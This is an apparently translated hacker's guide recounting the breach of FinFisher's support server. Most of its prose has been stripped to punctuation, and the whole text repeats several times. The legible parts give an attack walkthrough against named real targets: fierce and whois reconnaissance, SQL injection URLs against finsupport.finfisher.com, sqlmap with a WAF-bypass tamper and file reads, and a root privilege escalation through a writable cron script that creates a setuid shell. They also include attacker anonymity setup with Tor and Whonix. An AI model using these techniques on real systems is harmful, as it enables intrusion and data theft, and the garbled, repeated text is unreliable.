  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (   22, 53, 80, 443, 4111 (  -   ). 


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  1. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

